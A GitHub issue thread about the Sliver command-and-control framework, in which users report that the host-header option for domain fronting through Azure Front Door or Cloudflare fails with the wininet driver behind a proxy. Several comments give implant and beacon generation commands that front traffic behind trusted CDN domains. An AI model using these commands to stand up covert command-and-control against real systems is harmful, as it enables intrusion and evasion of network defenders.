Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

changing host header does not work #1707

Open
MaorSabag opened this issue Jun 8, 2024 · 8 comments
Open

changing host header does not work #1707

MaorSabag opened this issue Jun 8, 2024 · 8 comments
Labels
bug Something isn't working

Comments

@MaorSabag
Copy link

MaorSabag commented Jun 8, 2024
edited
Loading

Describe the bug
I have a frontdoor setup on azure for domain fronting (for example: frontdoor.azureedge.net), when generating an http/s payload and setting the host-header to the azure domain, it does not set it up when the payload is executed.

To Reproduce
Steps to reproduce the behavior:

  1. Generate http/s payload:
    generate --http ajax.microsoft.com/api?driver=wininet&host-header=frontdoor.azureedge.net --skip-symbols
  2. Execute the payload (windows platform)
  3. View the https traffic using proxy tool
  4. the host header is not set 🥲

Expected behavior
the host header should be: frontdoor.azureedge.net with the domain of ajax.microsoft.com.

Screenshots
The request sent from the payload:
image

Working request to the azure frontdoor by setting the host header manually:
image

Desktop (please complete the following information):

  • OS: Payload running on Windows, sliver client and server are on Ubuntu.
  • Version v1.5.42

Additional context
Even tried to change the code manually (eventhough I'm so sure about), set the req.Host = "frontdoor.azureedge.net".
But it had not effect on the request.
image
@rkervella rkervella added the bug Something isn't working label Jun 10, 2024
@navaneeth-dev
Copy link

navaneeth-dev commented Jun 20, 2024
edited
Loading

Just tried to replicate it, everything is working fine, maybe try generating with -d and post the logs of the client?

@MaorSabag
Copy link
Author

Screenshot with -d options:
image

@navaneeth-dev
Copy link

Oh I did not use wininet driver, can you try without that?

@MaorSabag
Copy link
Author

Got a few insights 😅
Without the driver parameter set but with a proxy set on the Windows host, got the same results:
image

Without the driver parameter set and without the proxy set on the Windows host, got a successful result:
image

Seems like a bug. I'm dealing with an organization proxy, thus the proxy options should be included if I want to use my frontdoor.

@navaneeth-dev
Copy link

Yes seems like a bug, I don't have the time right now but maybe others can look into it.

sliver/implant/sliver/proxy/provider_windows.go

Line 287 in 3051de7

winhttp.WINHTTP_ACCESS_TYPE_NO_PROXY,

I don't see any references to WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY which should detect the proxy automatically.
But I am not too sure.

@markuta
Copy link

markuta commented Jun 28, 2024

I had a very similar problem, but with Cloudflare instead of Azure. I solved it by removing the driver=wininet parameter when generating a beacon e.g.

generate beacon --http http://cdnjs.com?host-header=XXXXXXXX.worker.dev  --seconds 5 --jitter 4 --save /tmp/beacon_http2.exe

@heyquentin
Copy link

I had a very similar problem, but with Cloudflare instead of Azure. I solved it by removing the driver=wininet parameter when generating a beacon e.g.

generate beacon --http http://cdnjs.com?host-header=XXXXXXXX.worker.dev  --seconds 5 --jitter 4 --save /tmp/beacon_http2.exe

Do you have any ideas on how I'd do this using CloudFront?

@MaorSabag
Copy link
Author

Hey, is there any update on this maybe?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@markuta @heyquentin @navaneeth-dev @rkervella @MaorSabag